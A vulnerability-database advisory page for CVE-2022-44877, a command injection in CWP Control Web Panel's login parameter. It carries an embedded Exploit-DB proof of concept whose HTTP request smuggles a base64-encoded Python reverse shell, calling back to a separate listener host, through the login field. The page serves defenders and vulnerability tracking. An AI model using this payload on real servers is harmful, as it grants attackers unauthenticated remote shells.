CVE-2022-44877

unknown KEV

Published 2023-01-17 · Modified 2023-01-17

💬 Discuss on Community ✚ Propose mitigation

CVSS v3

—

CVSS v4 NEW

—

not yet in upstream

VIR risk

2.5

Description

CWP Control Web Panel (formerly CentOS Web Panel) contains an OS command injection vulnerability that allows remote attackers to execute commands via shell metacharacters in the login parameter.

CISA KEV

Vendor: CWP
Product: Control Web Panel
Due date: 2023-02-07

Predictions

Exploit likelihood

99%

Patch ETA

—

Heuristic predictions, AS-IS, for prioritization only.

Mitigations

No mitigations published for this CVE yet.

The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.

✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here with source_tier=community-verified.

Exploits

Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.

Exploit-DB

EDB-51250 webapps php

Mayank Deshmukh · 2023-04-05

Control Web Panel 7 (CWP7) v0.9.8.1147 - Remote Code Execution (RCE)

Source code queued for fetch — refresh in a moment.

EDB-51194 webapps linux text · 2 KB

numan türle · 2023-04-01

Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)

text exploit Source: Exploit-DB

[+] Exploit Title: Centos Web Panel 7 v0.9.8.1147 - Unauthenticated Remote Code Execution (RCE)
[+] Centos Web Panel 7 - < 0.9.8.1147
[+] Affected Component ip:2031/login/index.php?login=$(whoami)
[+] Discoverer: Numan Türle @ Gais Cyber Security
[+] Author: Numan Türle
[+] Vendor: https://centos-webpanel.com/ - https://control-webpanel.com/changelog#1669855527714-450fb335-6194
[+] CVE: CVE-2022-44877


Description
--------------
Bash commands can be run because double quotes are used to log incorrect entries to the system.

Video Proof of Concept
--------------
https://www.youtube.com/watch?v=kiLfSvc1SYY


Proof of concept:
--------------
POST /login/index.php?login=$(echo${IFS}cHl0aG9uIC1jICdpbXBvcnQgc29ja2V0LHN1YnByb2Nlc3Msb3M7cz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSk7cy5jb25uZWN0KCgiMTAuMTMuMzcuMTEiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTtvcy5kdXAyKHMuZmlsZW5vKCksMik7aW1wb3J0IHB0eTsgcHR5LnNwYXduKCJzaCIpJyAg${IFS}|${IFS}base64${IFS}-d${IFS}|${IFS}bash) HTTP/1.1
Host: 10.13.37.10:2031
Cookie: cwpsrv-2dbdc5905576590830494c54c04a1b01=6ahj1a6etv72ut1eaupietdk82
Content-Length: 40
Origin: https://10.13.37.10:2031
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: https://10.13.37.10:2031/login/index.php?login=failed
Accept-Encoding: gzip, deflate
Accept-Language: en
Connection: close

username=root&password=toor&commit=Login
--------------

Solution
--------
Upgrade to CWP7 current version

Metasploit modules

exploit_linux/http/control_web_panel_login_cmd_exec rank 600

CWP login.php Unauthenticated RCE

Source fetch failed: fetch_error — view the original via the link above.

References

https://control-webpanel.com/changelog#1669855527714-450fb335-6194; https://nvd.nist.gov/vuln/detail/CVE-2022-44877

Community-verified mitigations for this CVE will appear above when contributors publish them.

Verify integrity in audit chain (admin only). AS-IS.